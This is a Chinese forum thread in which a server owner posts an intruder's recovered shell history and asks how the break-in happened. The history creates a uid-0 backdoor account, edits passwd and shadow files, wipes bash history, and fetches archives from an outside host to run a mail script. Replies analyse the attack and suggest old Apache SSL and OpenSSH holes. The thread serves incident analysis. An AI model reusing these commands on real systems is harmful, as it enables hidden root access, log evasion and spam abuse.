服务器被黑，请高手指点是用什么方法黑的

memory

今早发现服务器起不来了，使用恢复盘启动后发现命令历史中有下面这些东西，请高手指点到底是怎么被黑的，用的是什么工具，以及如何清除？

cd /usr/share/.a
./mig -u root -n 0
useradd -o -u 0 -g 0 -d /var/log/lib lib
passwd lib
vi /etc/passwd
mv /etc/passwd /etc/passwd-
cp /etc/passwd- /etc/passwd
vi /etc/shadow
mv /etc/shadow /etc/shadow-
cp /etc/shadow- /etc/shadow
w
ls -al
cd /root
rm -rf .bash_history
exit
bash
cd /usr/share/.a
ls -al
rm -rf spp6/
wget www.geocities.com/adasadaa/sp1.tgz
ftp ftp.geocities.com
tar zxvf sp1.tgz
rm -rf sp1.tgz
cd sp1/
ls -al
cat list.txt
php mib.php
cd ..
rm -rf sp1/
ftp ftp.geocities.com
tar zxvf sp1.tgz
cd sp1
php mib.php
service sendmail restart
service sendmail start
ls-al
ls -al
cd ..
rm -rf sp1
ftp ftp.geocities.com
tar zxvf ps1.tgz
rm -rf ps1.tgz
cd s
cd sp
cd sp1
ls -al
php mib.php
ls -al
rm -rf list.txt
cat >> list.txt
vi list.txt
php mib.php
ps -ax
ps -ax
mail
mail ssolicss@yahoo.com
ps -ax
ps -ax
ps -ax
ps -ax
cd ..
wget www.geocities.com/adasadaa/ps2.tgz; tar zxvf ps2.tgz; rm -rf ps2.tgz; cd sp2; rm -rf list.txt
ftp ftp.geocities.com
ls -al
rm -rf ps1* sp1*
tar zxvf sp2.tgz
mv 2.txt sp2/
cd sp2/
ls -al
ls -al
rm -rf list.txt
mv 2.txt list.txt
perl perl.pl &
ls -la

qzhou9887

系统还能修复正常起来吗，接入网上来，让兄弟们连到你的服务器上瞧瞧。

Yuri

这个人不怎么精,手法还比较嫩.

kissingwolf

嫩的很，估计是进入系统后太兴奋了，竟然先删了.bash_history,而后又没有kill -9 0 销毁踪迹！ 在输入的时候竟然有键入错误！
另：
   最好告诉我们你的系统版本，kernel版本，打开了什么服务器，是否有防火墙规则，否则谁知道呢？

Yuri

最好马上把user name&password&ip address都发到我的邮箱.否则谁知道呢?

kissingwolf

Post by Yuri
最好马上把user name&password&ip address都发到我的邮箱.否则谁知道呢?

Yuri兄搞笑了！

memory

谢谢大家关心！
我很早以前装的rh9，系统已经起不来了，那个家伙替换了很多系统工具。后来覆盖安装一遍系统，凑合着起来了。发现多出一个lib用户，uid与gid都是0，相当于克隆了root。
现在还不知道是通过什么漏洞登上来的。哪位有相关经验可以介绍一下。

kissingwolf

apache的ssl + openssh
老洞了！

memory

kissingwolf兄能不能详细的介绍一下，或者给个连接也行。

1ball

这个人看起来正在试图用脚本调用sendmail发垃圾邮件